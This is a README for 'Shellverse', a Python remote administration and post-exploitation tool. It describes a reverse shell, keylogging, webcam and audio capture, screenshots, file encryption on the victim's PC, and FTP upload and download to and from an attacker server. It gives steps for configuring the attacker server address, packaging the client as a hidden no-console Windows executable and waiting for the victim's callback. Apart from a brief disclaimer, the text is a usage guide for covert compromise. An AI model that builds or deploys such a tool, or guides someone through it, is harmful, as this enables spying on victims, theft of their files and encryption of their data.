/shellverse

Shellverse is a multi-client and multi-threaded Remote Administration Tool and post-exploitation tool

Primary LanguagePythonMIT LicenseMIT

Shellverse

Overview

  • Shellverse is a simple multi-client Remote Administration Tool and a post-exploitation tool.
  • Shellverse gives the attacker a reverse shell together with configured payloads once it has been installed on the victims machine.
  • Disclaimer: Accessing a computer without authorization or permission is illegal, atleast in my country it is. This should only be used for educational / proof of concept purpose.
  • I wote most of this code years ago when learning python, i'll try to clean the code as much as I can. Feel free to contribute by writing payloads and making pull requests.

Features

  • Reverse shell.
  • Download files from the client's PC
  • Upload files to the client's PC
  • webcam snap & webcam livestream.
  • record audio & stream audio.
  • Take screenshots
  • Encrypt files on the clients PC.
  • Change the client's wallpaper.
  • Keylogger.

Supported Platforms

  • The reverse shell payload has been tested on linux & windows computers.
  • The other payloads such as screenshot & wallpaper-changing have only been tested on windows.

Setup/ Installation requirements

Requirements

  • Python 3.
  • create and activate a virtual environment
python -m venv virtual
#unix
source virtual/bin/activate
#windows cmd
virtual\Scripts\activate
  • pip install -r requirements.txt

Usage

Server

  • python runserver.py for the server to listen for connections.
  • edit server/settings.py to configure TCP server and FTP server settings.
  • Enter Host/Server address, to get an interactive prompt where you are able to view connected clients, select a specific client, and get a reverse shell

For help

shellverse> help
help:	Shows this help list
list:	show  connected targets
about:	print details about shellverse
show payloads:	show additional payloads
select:	Selects a target by its index. Takes index as a parameter
quit:	Stops current connection with a target. To be used when target is selected
shutdown:	Shuts server down

Client & server - getting a reverse shell.

  • First edit the clients configurations in client/settings.py.
......
SERVER_ADDR= '127.0.0.1' # server address
SERVER_PORT=999 #server port, should be an integer not string
RETRY_TIME=5 #in seconds
......
  • python shellverse.py on the client machine to make a tcp socket connection to the server
  • check the running server instance and connect to client using select command.

Payloads

  • The new version of shellverse makes it very easy to use and write new payloads.
  • Refer to payloads/abstract_payload_handler.py to see how to write a payload class.
  • To uses a payload add it to the payload registry in payloads/payload_register.py.
  • Only payloads whose platform match the configured platform in client/settings.py will be selected.
  • Shellverse comes with some payload examples, you can easily add yours by implementing AbstractPayloadHandler interface.
  • When I get time i'll write a wiki for this payloads
[1]ftp-upload: uploads a file from the attackers ftp server to the victims computer.
          usage~ ftp-upload file-path

[2]ftp-download: downloads a file/folder from the victims computer to our ftp server.
            usage~ftp-download file-path

Making a windows executable and getting a reverse connection

  • You can make a noconsole exe to run on the target. pyinstaller --noconsole --onefile shellverse.py run pyinstaller --help for more options such as an icon for the exe file.

Getting a reverse connection

  • Execute the exe in the targets machine, run the server script on the Host machine and a wait a reverse connection.
shellverse> 
Connection has been established: DESKTOP-R5UIHJE (192.168.0.31)

Contributing

  • Fork the repo, add payloads(using the documented method) / fix bugs or any other contribution, and make a pull request.

License

This project is Licensed under the MIT open source license